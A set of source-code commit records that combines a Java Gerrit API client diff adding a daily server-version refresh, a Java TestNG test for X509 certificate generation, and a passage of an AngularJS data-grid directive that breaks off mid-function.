withVersionRequestCheck(mService.setProjectConfig(projectName, input)); } @Override public Observable<ResponseBody> runProjectGc(@NonNull String projectName, @NonNull GcInput input) { return withVersionRequestCheck(mService.runProjectGc(projectName, input)); } @Override public Observable<BanResultInfo> banProject( @NonNull String projectName, @NonNull BanInput input) { return withVersionRequestCheck(mService.banProject(projectName, input)); } @Override public Observable<ProjectAccessInfo> getProjectAccessRights(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectAccessRights(projectName)); } @Override public Observable<ProjectAccessInfo> setProjectAccessRights( @NonNull String projectName, @NonNull ProjectAccessInput input) { return withVersionRequestCheck(mService.setProjectAccessRights(projectName, input)); } @Override public Observable<List<BranchInfo>> getProjectBranches(@NonNull String projectName, @Nullable Integer count, @Nullable Integer start, @Nullable String substring, @Nullable String regexp) { return withVersionRequestCheck( mService.getProjectBranches(projectName, count, start, substring, regexp)); } @Override public Observable<BranchInfo> getProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranch(projectName, branchId)); } @Override public Observable<BranchInfo> createProjectBranch( @NonNull String projectName, @NonNull String branchId, @NonNull BranchInput input) { return withVersionRequestCheck(mService.createProjectBranch(projectName, branchId, input)); } @Override public Observable<Void> deleteProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.deleteProjectBranch(projectName, branchId)); } @Override public Observable<Void> deleteProjectBranches( @NonNull String projectName, @NonNull DeleteBranchesInput input) { return withVersionRequestCheck(mService.deleteProjectBranches(projectName, input)); } @Override public Observable<Base64Data> getProjectBranchFileContent( @NonNull String projectName, @NonNull String branchId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectBranchFileContent(projectName, branchId, fileId)); } @Override public Observable<MergeableInfo> getProjectBranchMergeableStatus(@NonNull String projectName, @NonNull String branchId, @NonNull String sourceBranchId, @Nullable MergeStrategy strategy) { return withVersionRequestCheck(mService.getProjectBranchMergeableStatus( projectName, branchId, sourceBranchId, strategy)); } @Override public Observable<List<ReflogEntryInfo>> getProjectBranchReflog( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranchReflog(projectName, branchId)); } @Override public Observable<List<ProjectInfo>> getProjectChildProjects(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectChildProjects(projectName)); } @Override public Observable<ProjectInfo> getProjectChildProject( @NonNull String projectName, @NonNull String childProjectName) { return withVersionRequestCheck( mService.getProjectChildProject(projectName, childProjectName)); } @Override public Observable<List<TagInfo>> getProjectTags(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectTags(projectName)); } @Override public Observable<TagInfo> getProjectTag(@NonNull String projectName, @NonNull String tagId) { return withVersionRequestCheck(mService.getProjectTag(projectName, tagId)); } @Override public Observable<TagInfo> createProjectTag( @NonNull String projectName, @NonNull String tagId, @NonNull TagInput input) { return withVersionRequestCheck(mService.createProjectTag(projectName, tagId, input)); } @Override public Observable<CommitInfo> getProjectCommit( @NonNull String projectName, @NonNull String commitId) { return withVersionRequestCheck(mService.getProjectCommit(projectName, commitId)); } @Override public Observable<Base64Data> getProjectCommitFileContent( @NonNull String projectName, @NonNull String commitId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectCommitFileContent(projectName, commitId, fileId)); } @Override public Observable<List<DashboardInfo>> getProjectDashboards(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDashboards(projectName)); } @Override public Observable<DashboardInfo> getProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.getProjectDashboard(projectName, dashboardId)); } @Override public Observable<DashboardInfo> setProjectDashboard(@NonNull String projectName, @NonNull String dashboardId, @NonNull DashboardInput input) { return withVersionRequestCheck( mService.setProjectDashboard(projectName, dashboardId, input)); } @Override public Observable<Void> deleteProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.deleteProjectDashboard(projectName, dashboardId)); } }
Refresh cached server version at least once every day Signed-off-by: Jorge Ruesga <[email protected]>
gerrit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java
Refresh cached server version at least once every day
<ide><path>errit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java <ide> import android.net.Uri; <ide> import android.support.annotation.NonNull; <ide> import android.support.annotation.Nullable; <add>import android.text.format.DateUtils; <ide> <ide> import com.burgstaller.okhttp.AuthenticationCacheInterceptor; <ide> import com.burgstaller.okhttp.CachingAuthenticatorDecorator; <ide> private final String mEndPoint; <ide> private final GerritApi mService; <ide> private final PlatformAbstractionLayer mAbstractionLayer; <del> protected ServerVersion mServerVersion; <add> private long mLastServerVersionCheck = 0; <add> ServerVersion mServerVersion; <ide> <ide> private final ApiVersionMediator mMediator = new ApiVersionMediator() { <ide> @Override <ide> <ide> private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { <ide> return Observable.fromCallable(() -> { <del> if (mServerVersion == null) { <add> long now = System.currentTimeMillis(); <add> if (mServerVersion == null || <add> (now - mLastServerVersionCheck > DateUtils.DAY_IN_MILLIS)) { <ide> mServerVersion = getServerVersion().toBlocking().first(); <add> mLastServerVersionCheck = now; <ide> } <ide> return observable.toBlocking().first(); <ide> });
Java
mit
7bcd6833cb72038731748617851f76269e4c4a2f
0
astrapi69/mystic-crypt,astrapi69/mystic-crypt
/** * The MIT License * * Copyright (C) 2015 Asterios Raptis * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package de.alpharogroup.crypto.factories; import java.math.BigInteger; import java.security.KeyPair; import java.security.NoSuchAlgorithmException; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; import java.security.cert.X509Certificate; import java.util.Date; import org.testng.AssertJUnit; import org.testng.annotations.Test; import de.alpharogroup.crypto.CryptConst; import de.alpharogroup.crypto.algorithm.HashAlgorithm; import de.alpharogroup.crypto.algorithm.KeyPairGeneratorAlgorithm; import de.alpharogroup.crypto.algorithm.RngAlgorithm; /** * Test class for the class {@link CertFactory}. */ public class CertFactoryTest { /** * Returns a random serial number that can be used for a serial number. * * @return a random serial number as a {@link BigInteger} object. */ public static BigInteger randomSerialNumber() { long next = 0; try { next = SecureRandom.getInstance(RngAlgorithm.SHA1PRNG.getAlgorithm()).nextLong(); } catch (final NoSuchAlgorithmException e) { e.printStackTrace(); } if (next < 0) { next = next * (-1); } final BigInteger serialNumber = BigInteger.valueOf(next); return serialNumber; } /** * Test method for * {@link CertFactory#newX509Certificate(PublicKey, PrivateKey, String, String, String, Date, Date)}. */ @Test public void testNewX509CertificatePublicKeyPrivateKeyStringStringStringDateDate() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); final PrivateKey privateKey = keyPair.getPrivate(); final PublicKey publicKey = keyPair.getPublic(); final String subject = "CN=Test subject"; final String issuer = "CN=Test issue"; final String signatureAlgorithm = HashAlgorithm.SHA256.getAlgorithm() + CryptConst.WITH + KeyPairGeneratorAlgorithm.RSA.getAlgorithm(); final Date start = new Date(System.currentTimeMillis()); final Date end = new Date(System.currentTimeMillis() + (1000L * 60 * 60 * 24 * 100)); final BigInteger serialNumber = randomSerialNumber(); final X509Certificate cert = CertFactory.newX509Certificate(publicKey, privateKey, serialNumber, subject, issuer, signatureAlgorithm, start, end); AssertJUnit.assertNotNull(cert); } /** * Test method for * {@link CertFactory#newX509CertificateV1(KeyPair, X500Name, BigInteger, Date, Date, X500Name, String)}. */ @Test public void testNewX509CertificateV1() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); X500Name issuer = new X500Name("CN=Issuer of this certificate"); BigInteger serial = BigInteger.ONE; Date notBefore = Date.from(Instant.now()); Date notAfter = Date.from(Instant.now().plusSeconds(60 * 60 * 24 * 365 * 5)); X500Name subject = new X500Name("CN=Subject of this certificate"); String signatureAlgorithm = "SHA1withRSA"; X509Certificate cert = CertFactory.newX509CertificateV1(keyPair, issuer, serial, notBefore, notAfter, subject, signatureAlgorithm); AssertJUnit.assertNotNull(cert); } }
crypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java
/** * The MIT License * * Copyright (C) 2015 Asterios Raptis * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package de.alpharogroup.crypto.factories; import java.math.BigInteger; import java.security.KeyPair; import java.security.NoSuchAlgorithmException; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; import java.security.cert.X509Certificate; import java.util.Date; import org.testng.AssertJUnit; import org.testng.annotations.Test; import de.alpharogroup.crypto.CryptConst; import de.alpharogroup.crypto.algorithm.HashAlgorithm; import de.alpharogroup.crypto.algorithm.KeyPairGeneratorAlgorithm; import de.alpharogroup.crypto.algorithm.RngAlgorithm; /** * Test class for the class {@link CertFactory}. */ public class CertFactoryTest { /** * Returns a random serial number that can be used for a serial number. * * @return a random serial number as a {@link BigInteger} object. */ public static BigInteger randomSerialNumber() { long next = 0; try { next = SecureRandom.getInstance(RngAlgorithm.SHA1PRNG.getAlgorithm()).nextLong(); } catch (final NoSuchAlgorithmException e) { e.printStackTrace(); } if (next < 0) { next = next * (-1); } final BigInteger serialNumber = BigInteger.valueOf(next); return serialNumber; } /** * Test method for * {@link CertFactory#newX509Certificate(PublicKey, PrivateKey, String, String, String, Date, Date)}. */ @Test public void testNewX509CertificatePublicKeyPrivateKeyStringStringStringDateDate() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); final PrivateKey privateKey = keyPair.getPrivate(); final PublicKey publicKey = keyPair.getPublic(); final String subject = "CN=Test subject"; final String issuer = "CN=Test issue"; final String signatureAlgorithm = HashAlgorithm.SHA256.getAlgorithm() + CryptConst.WITH + KeyPairGeneratorAlgorithm.RSA.getAlgorithm(); final Date start = new Date(System.currentTimeMillis()); final Date end = new Date(System.currentTimeMillis() + (1000L * 60 * 60 * 24 * 100)); final BigInteger serialNumber = randomSerialNumber(); final X509Certificate cert = CertFactory.newX509Certificate(publicKey, privateKey, serialNumber, subject, issuer, signatureAlgorithm, start, end); AssertJUnit.assertNotNull(cert); } }
Update CertFactoryTest.java
crypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java
Update CertFactoryTest.java
<ide><path>rypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java <ide> AssertJUnit.assertNotNull(cert); <ide> } <ide> <add> /** <add> * Test method for <add> * {@link CertFactory#newX509CertificateV1(KeyPair, X500Name, BigInteger, Date, Date, X500Name, String)}. <add> */ <add> @Test <add> public void testNewX509CertificateV1() throws Exception { <add> final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); <add> X500Name issuer = new X500Name("CN=Issuer of this certificate"); <add> BigInteger serial = BigInteger.ONE; <add> Date notBefore = Date.from(Instant.now()); <add> Date notAfter = Date.from(Instant.now().plusSeconds(60 * 60 * 24 * 365 * 5)); <add> X500Name subject = new X500Name("CN=Subject of this certificate"); <add> String signatureAlgorithm = "SHA1withRSA"; <add> X509Certificate cert = CertFactory.newX509CertificateV1(keyPair, issuer, serial, notBefore, notAfter, subject, <add> signatureAlgorithm); <add> AssertJUnit.assertNotNull(cert); <add> } <add> <ide> }
JavaScript
mit
1c473c5ab05f13405a7dc62b9ac427eeba38dbac
0
vision-ti/angular-vision-grid,vision-ti/angular-vision-grid
'use strict'; /* * angular-vision-grid * v1.0.0-rc2 * (c) 2014 VisionGrid Team http://vision-ti.com.br * License: MIT */ angular.module('vision.grid', ['vision.grid.util']) /** * Directive para ser utilizada pela coluna ao realizar o sort * Útil para ser utilizada dentro de um headerRenderer customizado */ .directive('columnSort', [function () { return { require: '^grid', restrict: 'E', templateUrl: 'template/vision/grid/column-sort.html' } }]) .directive('visionCell', [function(){ return { require: '^visionGrid', replace: 'A', link: function(scope, element, attrs, gridCtrl){ if (scope.column.editable){ var position = attrs.rowIndex + attrs.colIndex; scope.cells[position] = { rowIndex: parseInt(attrs.rowIndex), colIndex: parseInt(attrs.colIndex), element: element, column: scope.column }; } scope.hasFocus = function(rowIndex, colIndex){ return (String(rowIndex) + String(colIndex) == scope.cellIndex.current.position); }; } } }]) .directive('gridEditor', ['$compile', function ($compile) { return { require: '^visionGrid', replace: 'A', link: function (scope, element, attrs) { if (!attrs.ngModel){ element.attr('ng-model', 'row.item.' + scope.column.fieldName); $compile(element)(scope); } } }; }]) .directive('visionGrid', ['vsGridUtil', '$filter', '$timeout', '$window', '$animate', function (vsGridUtil, $filter, $timeout, $window, $animate) { return { restrict: 'E', replace: true, templateUrl: 'template/vision/grid/vision-grid.html', transclude: true, scope: { init: '&', provider: '=?', onSelect: '&', itemDoubleClick: '&', cellBlur: '&', height: '@', selectionMode: '@', headerHeight: '@', rowHeight: '@', rowColorFunction: '&', rowColorField: '@', scrollOffset: '@', headerBar: '@', footerBar: '@', expandRowUrl: '@', expandColumnHeader: '@', expandColumnRenderer: '@', toggleExpandRow: '=?', virtualScrollEnabled: '=?', minRows: '@' }, controller: ['$scope', '$element', '$attrs', function ($scope, $elment, $attrs) { this.nextCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex + 1); }; this.previousCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex - 1); }; /** * Disparado pelo grid column * @param column */ this.addColumn = function (column) { this.addColumnAt($scope.columns.length, column); }; /** * Adiciona uma coluna em uma posição específica * @param index * @param column */ this.addColumnAt = function (index, column) { if (!angular.isDefined(column.fieldName)) { throw 'When adding gridColumn, fieldName is required!'; } $scope.addColumnAt(index, column); }; /** * Retorna a coluna pelo fieldName * @param fieldName */ this.getColumnByFieldName = function (fieldName) { for (var i = 0; i < $scope.columns.length; i++) { if ($scope.columns[i].fieldName == fieldName) return $scope.columns[i]; } }; /** * Retorna a coluna pelo índice * @param $index * @returns {*} */ this.getColumn = function ($index) { return $scope.columns[$index]; }; /** * Retorna o array das colunas * @returns {Array} */ this.getColumns = function () { return $scope.columns; }; /** * Função para setar o provider manualmente no $scope da directive * @param provider */ this.setProvider = function (provider) { $scope.provider = provider; }; /** * Função para obter o item selecionado da grid * @return {Object} */ this.getSelectedItem = function () { return $scope.selectedItem; }; /** * Retorna a coluna selecionada * @returns {*|columnSelected|getData.columnSelected} */ this.getColumnSelected = function () { return $scope.columnSelected; }; //Update grid height and recalculate this.setHeight = function (value) { $scope.updateHeight(value); }; /** * Obtém o nome da grid */ this.getGridName = function () { return $scope.gridName; }; /** * Configura a expandRow * @param expandRowUrl */ this.setExpandRowUrl = function (expandRowUrl) { $scope.setExpandRowUrl(expandRowUrl); }; /** * Muda o outerScope padrão que é o scope.$parent * @param outerScope */ this.setOuterScope = function (outerScope) { $scope.outerScope = outerScope; }; }], link: function (scope, element, attrs, ctrl) { var userAgent = $window.navigator.userAgent.toLowerCase(); var isFirefox = userAgent.indexOf('firefox') > -1; var isOpera = userAgent.indexOf('opera') > -1; var commandKeyCode = isFirefox ? 224 : (isOpera ? 17 : 91 /* webkit */); scope.outerScope = scope.$parent; scope.cells = {}; scope.editableColumns = []; //Define se a expand-row será mantida aberta scope.toggleExpandRow = vsGridUtil.getDefined(scope.toggleExpandRow, true); scope.gridName = vsGridUtil.getDefined(attrs.name, 'grid'); //Cria uma referência do ctrl no scope do elemento parent angular.element(element[0].parentElement).scope()[scope.gridName] = ctrl; /** * Será a cópia do provider * Essencial para realizar o sort na lista para que o selectedIndex seja buscado pelo provider original * @type {Array} */ scope.gridProvider = []; /** * ng-repeat * @type {Array} */ scope.renderedProvider = []; scope.viewPortStyle = {}; scope.tablePortStyle = {}; scope.tablePortStyle.position = 'relative'; scope.columns = []; var minRows, headerHeight, height, rowHeight, viewPortHeight; // Define a quantidade mínima de linhas a serem exibidas na grid scope.minRows = vsGridUtil.getDefined(scope.minRows, '0'); minRows = Number(scope.minRows); //Seta o headerHeight scope.headerHeight = vsGridUtil.getDefined(scope.headerHeight, '30px'); headerHeight = Number(scope.headerHeight.replace('px', '')); scope.headerStyle = {}; scope.headerStyle.height = scope.headerHeight; scope.headerStyle.lineHeight = scope.headerHeight; // headerHeight attrs.rowHeight = vsGridUtil.getDefined(scope.rowHeight, '30px'); rowHeight = Number(attrs.rowHeight.replace('px', '')); //Altura da grid attrs.height = vsGridUtil.getDefined(attrs.height, '300px'); height = Number(attrs.height.replace('px', '')); scope.styleContainer = {}; scope.styleContainerInner = {}; if (scope.virtualScrollEnabled) { scope.styleContainer.height = attrs.height; scope.styleContainerInner.height = (height - headerHeight) + 'px'; } var innerContainer = element.find('.fixed-table-container-inner'); var headerBar = null, footerBar = null; var tableHeader = element.find('.table-header'); var spinner = element.find('#vs-grid-spinner'); var raw = innerContainer[0]; var rangeStart, rangeEnd; innerContainer.scroll(function (event) { //Header scroll(horizontal) if (headerBar == null && footerBar == null) { headerBar = element.find('.vs-header-bar'); footerBar = element.find('.vs-footer-bar'); } else { headerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); footerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); } tableHeader.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); if (scope.virtualScrollEnabled) { //Virtual scroll(vertical) rangeStart = Math.ceil(raw.scrollTop / rowHeight); rangeEnd = Math.ceil((raw.scrollTop + raw.offsetHeight) / rowHeight); if (raw.scrollTop + raw.offsetHeight <= viewPortHeight) { scope.tablePortStyle.top = raw.scrollTop + 'px'; scope.renderProvider(scope.gridProvider.slice(rangeStart, rangeEnd)); scope.$digest(); } } }); /** * Change scroll position to rowIndex */ scope.scrollToRowIndex = function(rowIndex){ $timeout(function(){ if (rowIndex < rangeStart){ raw.scrollTop -= rowHeight; innerContainer.scroll(); }else if (rowIndex + 1 > rangeEnd){ raw.scrollTop += rowHeight; innerContainer.scroll(); } }); }; /** * Return virtual rows lenght to render rows with no-data, for visual aspect * @returns {number} */ var getVirtualRowsLength = function () { return scope.virtualScrollEnabled ? Math.ceil((height - headerHeight) / rowHeight) : scope.gridProvider.length; }; /** * Update virtual scroll height * @param height */ scope.updateHeight = function (value) { height = value; scope.styleContainer.height = height + 'px'; scope.styleContainerInner.height = (height - headerHeight) + 'px'; scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); scope.$apply(); }; /** * Adiciona as rows a serem renderizadas */ scope.renderProvider = function (rows, length) { if (length == undefined) { length = rows.length; } scope.renderedProvider.length = length; for (var i = 0; i < length || i < minRows; i++) { if (angular.isDefined(rows[i])) { scope.renderedProvider[i] = {item:rows[i]}; } else { scope.renderedProvider[i] = {}; } } }; /** * Atualiza o gridProvider */ scope.$watchCollection('provider', function (newValue, oldValue) { clearSelection(); //Realiza a cópia do provider scope.gridProvider = []; if (scope.provider != null && scope.provider != undefined) angular.extend(scope.gridProvider, scope.provider); //Faz o cálculo do height da viewPort para virtual scroll if (scope.virtualScrollEnabled && angular.isDefined(newValue) && newValue.length > 0) { viewPortHeight = newValue.length * rowHeight; scope.viewPortStyle.height = viewPortHeight + 'px'; } if (oldValue == undefined || newValue == undefined || newValue.length != oldValue.length) { $timeout(function () { raw.scrollTop = 0; innerContainer.scroll(); }); } }); /** * Atualiza o renderedProvider */ scope.$watchCollection('gridProvider', function (value) { //Desenha as rows (desenha rows virtuais sem dados no caso de virtualScrollEnabled) scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); rangeStart = 0; rangeEnd = scope.renderedProvider.length; }); /** * Configura o style da row * @param item * @returns {{}} */ scope.getRowStyle = function (item) { var rowStyle = {}; rowStyle.height = scope.rowHeight; //Desenha a cor de fundo da row por uma propriedade de um item do provider if (angular.isDefined(scope.rowColorField)) { var color = vsGridUtil.evaluate(item, scope.rowColorField); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } //Desenha a cor de fundo de acordo com uma function if (angular.isDefined(attrs.rowColorFunction)) { var color = scope.rowColorFunction({$item: item}); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } return rowStyle; }; /** * Configura o style da coluna * @param column */ scope.getColumnStyle = function (column, position) { var columnStyle = {}; if (position == 'header') { columnStyle.textAlign = column.headerTextAlign; } else { columnStyle.textAlign = column.textAlign; } if (angular.isDefined(column.width)) columnStyle.width = column.width; else { columnStyle.minWidth = '80px'; columnStyle.width = 'auto !important'; } return columnStyle; }; /** * Adiciona a coluna * Private function * @param index * @param column */ scope.addColumnAt = function (index, column) { column.index = index; if (column instanceof GridColumnDecimal && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDecimal; } if (column instanceof GridColumnDate && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDate; } if (column instanceof GridColumnEnum && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatEnum; } if (column.editable) scope.editableColumns.push(column); /** * Evento disparado no $rootScope para configuração * de labelFunction de implementações de outras colunas */ scope.$emit('grid:addColumn', column); scope.columns.splice(index, 0, column); }; /** * Retorna a String do item para exibir na grid * @param item * @param column * @returns {*} */ scope.getItem = function ($index, item, column) { var valueOf; if (angular.isFunction(column.labelFunction)) { valueOf = column.labelFunction(item, column, $index); } else valueOf = vsGridUtil.evaluate(item, column.fieldName); return valueOf != undefined ? valueOf.toString() : ''; }; /** * Verifica se foi informado o headerRenderer na coluna * @param column * @returns {boolean|*} */ scope.isHeaderRenderer = function (column) { return angular.isDefined(column.headerRenderer); }; /** * Verifica se tem um itemRenderer informado * @param column * @returns {boolean} */ scope.isItemRenderer = function (item, column) { return angular.isDefined(column.itemRenderer); }; /** * Dispara o double-click */ scope.selectItemDblclick = function (item, column) { scope.selectItem(item, column); if (attrs.itemDoubleClick) { scope.itemDoubleClick({$data: scope.getData()}); } scope.$emit(scope.gridName + ':itemDoubleClick', scope.getData()); }; /** * Seta o selectedItem * @param item */ scope.selectedItems = []; attrs.selectionMode = vsGridUtil.getDefined(scope.selectionMode, 'single'); var begin, end, virtualIndex, lastIndex = -1; scope.selectItem = function (item, column) { scope.columnSelected = column; if (!angular.isDefined(item)) return; scope.selectedIndex = scope.provider.indexOf(item); virtualIndex = scope.gridProvider.indexOf(item); scope.selectedItem = item; if (scope.shiftKey) { if (lastIndex == -1) { lastIndex = virtualIndex; scope.selectedItems = []; } if (lastIndex < virtualIndex) { begin = lastIndex; end = virtualIndex; } else { begin = virtualIndex; end = lastIndex; } scope.selectedItems = scope.gridProvider.slice(begin, end + 1); } else if (scope.ctrlKey) { if (scope.selectedItems.indexOf(item) == -1) scope.selectedItems.push(item); else { var indexOf = scope.selectedItems.indexOf(item); scope.selectedItems.splice(indexOf, 1); } lastIndex = virtualIndex; } else { lastIndex = virtualIndex; scope.selectedItems = [item]; } if (angular.isDefined(attrs.onSelect)) { //Callback function para o item selecionado scope.onSelect({$data: scope.getData()}); } scope.$emit(scope.gridName + ':onSelect', scope.getData()); }; /** * Object com a informação do item selecionado na grid * @returns {{}} */ scope.getData = function () { var $data = {}; $data.selectedIndex = scope.selectedIndex; $data.selectedItem = scope.selectedItem; $data.columnSelected = scope.columnSelected; $data.selectedItems = scope.selectedItems; return $data; }; /** * Limpa a seleção * @private */ var clearSelection = function () { scope.selectedItems = []; scope.selectedItem = null; scope.selectedIndex = null; scope.selectedColumn = null; }; /** * Ao clicar em um item atribui o class de seleção * @param item * @returns {string} */ scope.selectClass = function (item) { if ((item == scope.selectedItem && scope.selectionMode == 'single') || (scope.selectedItems.indexOf(item) != -1 && scope.selectionMode == 'multiple')) { return 'selected-item'; } else return ''; }; /** * onKeyDown * @param $event */ scope.onKeyDown = function ($event) { if ($event.keyCode == 9) { if ($event.shiftKey){ ctrl.previousCell(); }else{ ctrl.nextCell(); } $event.preventDefault(); } if ($event.keyCode == 38 || $event.keyCode == 40) { if (virtualIndex == undefined) virtualIndex = -1; //up key if ($event.keyCode == 38) { if (virtualIndex < 0) { virtualIndex = 0 } else if (virtualIndex > 0) { virtualIndex--; } } //down key if ($event.keyCode == 40) { if (virtualIndex > scope.gridProvider.length) { virtualIndex = scope.gridProvider.length; } else if (virtualIndex < scope.gridProvider.length) { virtualIndex++; } } scope.selectItem(scope.gridProvider[virtualIndex], scope.selectedColumn); scope.scrollToRowIndex(virtualIndex); } if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey || $event.keyCode == commandKeyCode; } scope.$emit(scope.gridName + ':onKeyDown', $event); }; scope.cellIndex = {current:{rowIndex: -1, colIndex: -1, position: '-1'}}; scope.cellIndex.old = scope.cellIndex.current; scope.goToCell = function(colIndex){ if (virtualIndex == undefined) virtualIndex = -1; if (scope.cellIndex.current.rowIndex == -1){ scope.cellIndex.current.rowIndex = 0; scope.cellIndex.current.colIndex = 0; } var rowIndex = scope.cellIndex.current.rowIndex; if (colIndex < 0){ virtualIndex--; rowIndex--; colIndex = scope.editableColumns[scope.editableColumns.length - 1].index; }else if (colIndex > scope.editableColumns.length -1){ virtualIndex++; rowIndex++; colIndex = scope.editableColumns[0].index; } var position = String(rowIndex) + String(scope.editableColumns[colIndex].index); var cell = scope.cells[position]; if (cell){ if (attrs.cellBlur && scope.cellIndex.old != scope.cellIndex.current){ scope.cellBlur({ $data:{ oldCell: scope.cells[scope.cellIndex.old.position], cell: scope.cells[scope.cellIndex.current.position], selectedItem: scope.getData().selectedItem } }); } scope.cellIndex.old = scope.cellIndex.current; scope.cellIndex.current.rowIndex = rowIndex; scope.cellIndex.current.colIndex = colIndex; scope.cellIndex.current.position = position; $timeout(function(){ angular.element(cell.element).find('input')[0].focus(); }); }else if (rowIndex > scope.renderedProvider.length - 1){ scope.scrollToRowIndex(virtualIndex); scope.goToCell(0); } }; /** * onKeyUp * @param $event */ scope.onKeyUp = function ($event) { if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey; if ($event.keyCode == commandKeyCode) scope.ctrlKey = false; } scope.$emit(scope.gridName + ':onKeyUp', $event); }; //Sort object scope.sort = { sortingField: 'id', reverse: false }; /** * class style do sorter * @param fieldName * @returns {string} */ scope.selectSorterClass = function (fieldName) { if (fieldName == scope.sort.sortingField) { return ('glyphicon glyphicon-chevron-' + ((scope.sort.reverse) ? 'down' : 'up')); } else { return ''; } }; /** * Realiza o sort * @param newSortingField */ scope.sortBy = function (newSortingField) { if (scope.sort.sortingField == newSortingField) { scope.sort.reverse = !scope.sort.reverse; } scope.sort.sortingField = newSortingField; scope.gridProvider = $filter('orderBy')(scope.provider, scope.sort.sortingField, scope.sort.reverse); }; /** * Verifica se tem headerBar * @returns {boolean|*} */ scope.hasHeaderBar = function () { return angular.isDefined(attrs.headerBar); }; /** * Verifica se tem footerBar * @returns {boolean|*} */ scope.hasFooterBar = function () { return angular.isDefined(attrs.footerBar); }; /** * Style header-footer */ var headerFooterStyle = {}; scope.getHeaderFooterStyle = function () { headerFooterStyle.width = innerContainer[0].scrollWidth; return headerFooterStyle; }; //Função disparada pelo expandColumnRenderer scope.openCloseExpandRow = function (item) { item.expandRowOpened = !item.expandRowOpened; if (scope.toggleExpandRow) { angular.forEach(scope.renderedProvider, function (value, index) { if (value != item) value.expandRowOpened = false; }); } }; scope.expandRow = undefined; /** * Configura a expandRow */ scope.setExpandRowUrl = function (expandRowUrl) { scope.expandRow = expandRowUrl; attrs.expandColumnRenderer = vsGridUtil.getDefined(scope.expandColumnRenderer, 'template/vision/grid/expandColumnRenderer.html'); var expandColumn = new GridColumn(); expandColumn.fieldName = 'expandColumn'; expandColumn.width = '70px'; expandColumn.textAlign = 'center'; expandColumn.itemRenderer = attrs.expandColumnRenderer; if (angular.isDefined(scope.expandColumnHeader)) { expandColumn.headerText = scope.expandColumnHeader; } scope.addColumnAt(0, expandColumn); }; if (angular.isDefined(scope.expandRowUrl)) scope.setExpandRowUrl(scope.expandRowUrl); /** * Dispara o método config para inicializar as colunas */ if (angular.isDefined(attrs.init)) { 